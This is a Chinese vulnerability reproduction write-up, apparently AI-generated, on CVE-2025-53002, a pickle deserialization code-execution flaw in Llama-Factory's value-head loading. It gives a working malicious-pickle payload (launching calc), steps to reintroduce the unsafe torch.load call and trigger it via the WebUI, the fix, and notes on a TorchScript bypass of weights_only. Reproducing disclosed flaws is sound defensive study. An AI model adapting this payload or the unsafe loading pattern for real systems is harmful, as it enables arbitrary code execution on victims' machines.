项目<\/th>	说明<\/th> <\/tr> <\/thead>
漏洞类型<\/td>	代码执行（反序列化）<\/td> <\/tr>
影响版本<\/td>	Llama-Factory ≤ v0.9.3 + Torch < 2.6<\/td> <\/tr>
触发方式<\/td>	恶意 Checkpoint 路径 + Reward Modeling 阶段<\/td> <\/tr>
修复方案<\/td>	添加 `weights_only=True<\/code> + 升级 Torch<\/td> <\/tr>`
扩展风险<\/td>	TorchScript 运算符滥用（已修复）<\/td> <\/tr> <\/tbody> <\/table> 📚 参考资料<\/h2> Llama-Factory GitHub Advisory<\/a><\/li> Torch weights_only 机制<\/a><\/li> Black Hat USA 2025: Safe Harbor or Hostile Waters<\/a><\/li> <\/ol> 如果有新的复现需求或技术细节探讨，可以进一步提供环境配置或漏洞利用样本。<\/p>

🚨 1. 漏洞概述<\/h2>

漏洞编号<\/strong>：CVE-2025-53002<\/li>
影响组件<\/strong>：Llama-Factory（<= v0.9.3）<\/li>
漏洞类型<\/strong>：代码执行（反序列化漏洞）<\/li>

触发条件<\/strong>：

使用 Torch < 2.6 版本（默认 weights_only=False<\/code>）<\/li>
通过 WebUI 设置恶意 Checkpoint 路径<\/li> <\/ul> <\/li>
根本原因<\/strong>：torch.load()<\/code> 未设置 weights_only=True<\/code>，导致恶意 Pickle 反序列化执行代码。<\/li> <\/ul> 📦 2. 环境搭建（复现环境）<\/h2> 2.1 依赖环境<\/h3> git clone --depth 1<\/span> https:\/\/github.com\/hiyouga\/LLaMA-Factory.git <\/span><\/span>cd LLaMA-Factory <\/span><\/span>conda create -n llama-factory python=<\/span>3.10 <\/span><\/span>conda activate llama-factory <\/span><\/span>pip install -e ".[torch,metrics]"<\/span> <\/span><\/span><\/code><\/pre>2.2 安装 PyTorch<\/h3> 根据 CUDA 版本从 PyTorch 官网<\/a>选择对应命令安装（需 < 2.6）。<\/p> 2.3 验证环境<\/h3> import<\/span> torch <\/span><\/span>print("Torch version:"<\/span>, torch.<\/span>__version__) <\/span><\/span>print("Is CUDA available:"<\/span>, torch.<\/span>cuda.<\/span>is_available()) <\/span><\/span><\/code><\/pre>2.4 模拟漏洞环境<\/h3> 修改文件：src\/llamafactory\/model\/model_utils\/valuehead.py<\/code> 将 torch.load(vhead_file, map_location="cpu")<\/code> 改为：<\/p> torch.<\/span>load(vhead_file, map_location=<\/span>"cpu"<\/span>, weights_only=<\/span>False<\/span>) # 模拟漏洞<\/span> <\/span><\/span><\/code><\/pre> ⚡ 3. 漏洞复现步骤<\/h2> 3.1 准备恶意模型<\/h3> 下载合法模型（如 tiny-random-Llama-3<\/a>）到本地。<\/li> 生成恶意 value_head.bin<\/code> 文件（替换原文件）：<\/li> <\/ol> import<\/span> torch <\/span><\/span>import<\/span> pickle <\/span><\/span>import<\/span> os <\/span><\/span> <\/span><\/span>class<\/span> Exploit<\/span>: <\/span><\/span> def<\/span> __reduce__<\/span>(self): <\/span><\/span> return<\/span> os.<\/span>system, ("calc"<\/span>,) # Windows 弹计算器<\/span> <\/span><\/span> <\/span><\/span>payload =<\/span> pickle.<\/span>dumps(Exploit()) <\/span><\/span>with<\/span> open("value_head.bin"<\/span>, "wb"<\/span>) as<\/span> f: <\/span><\/span> f.<\/span>write(payload) <\/span><\/span><\/code><\/pre>3.2 配置 WebUI<\/h3> 启动 WebUI：<\/li> <\/ol> llamafactory-cli webui <\/span><\/span><\/code><\/pre> 配置训练任务： Model Name<\/strong>: 选择或输入本地模型路径<\/li> Checkpoint Path<\/strong>: 指向包含恶意 value_head.bin<\/code> 的目录<\/li> Stage<\/strong>: 选择 Reward Modeling<\/code><\/li> Dataset<\/strong>: 任意数据集（如 example<\/code>）<\/li> <\/ul> <\/li> 点击 Start<\/strong>，触发代码执行（如弹出计算器）。<\/li> <\/ol> 🔍 4. 漏洞分析<\/h2> 4.1 调用链梳理<\/h3> WebUI 输入 Checkpoint Path → model_args.adapter_name_or_path[-1] → cached_file(filename="value_head.bin", path_or_repo_id=checkpoint_path) → load_valuehead_params(vhead_file=malicious_file) → torch.load(vhead_file, weights_only=False) \/\/ 触发反序列化 <\/code><\/pre> 4.2 关键代码位置<\/h3> 漏洞函数<\/strong>：src\/llamafactory\/model\/model_utils\/valuehead.py<\/code> → load_valuehead_params()<\/code><\/li> 调用入口<\/strong>：src\/llamafactory\/model\/loader.py<\/code> → load_model()<\/code><\/li> 触发条件<\/strong>：Stage 为 Reward Modeling<\/code>（调用 run_rm()<\/code>）<\/li> <\/ul> 4.3 为什么是 Reward Modeling？<\/h3> 只有该阶段会加载 valuehead 模型并调用 load_valuehead_params()<\/code>。<\/li> <\/ul> 🛠️ 5. 漏洞修复方案<\/h2> 5.1 官方修复<\/h3> 在 torch.load()<\/code> 中显式添加 weights_only=True<\/code>：<\/p> torch.<\/span>load(vhead_file, map_location=<\/span>"cpu"<\/span>, weights_only=<\/span>True<\/span>) <\/span><\/span><\/code><\/pre>5.2 用户建议<\/h3> 升级 Llama-Factory 至 v0.9.3+<\/li> 确保 Torch ≥ 2.6（默认 weights_only=True<\/code>）<\/li> <\/ul> 🔥 6. 漏洞扩展：Bypass weights_only=True？<\/h2> 6.1 TorchScript 加载机制<\/h3> 即使设置 weights_only=True<\/code>，仍可通过 torch.jit.load()<\/code> 加载 TorchScript 模型（.pt 文件），其支持调用运算符（如 aten::save<\/code>）实现文件写入\/RCE。<\/p> 6.2 利用条件（已修复）<\/h3> 需绕过 model.load_state_dict()<\/code> 的字典类型检查（最新版已修复）。<\/li> 需编译 TorchScript 模型并重写 forward<\/code> 方法调用恶意运算符。<\/li> <\/ul> 6.3 最新版本防护<\/h3> Torch 2.6+ 默认启用 weights_only=True<\/code><\/li> Llama-Factory 显式启用安全参数<\/li> TorchScript 恶意模型加载已被限制<\/li> <\/ul> ✅ 7. 总结<\/h2> 项目<\/th> 说明<\/th> <\/tr> <\/thead> 漏洞类型<\/td> 代码执行（反序列化）<\/td> <\/tr> 影响版本<\/td> Llama-Factory ≤ v0.9.3 + Torch < 2.6<\/td> <\/tr> 触发方式<\/td> 恶意 Checkpoint 路径 + Reward Modeling 阶段<\/td> <\/tr> 修复方案<\/td> 添加 weights_only=True<\/code> + 升级 Torch<\/td> <\/tr> 扩展风险<\/td> TorchScript 运算符滥用（已修复）<\/td> <\/tr> <\/tbody> <\/table> 📚 参考资料<\/h2> Llama-Factory GitHub Advisory<\/a><\/li> Torch weights_only 机制<\/a><\/li> Black Hat USA 2025: Safe Harbor or Hostile Waters<\/a><\/li> <\/ol> 如果有新的复现需求或技术细节探讨，可以进一步提供环境配置或漏洞利用样本。<\/p>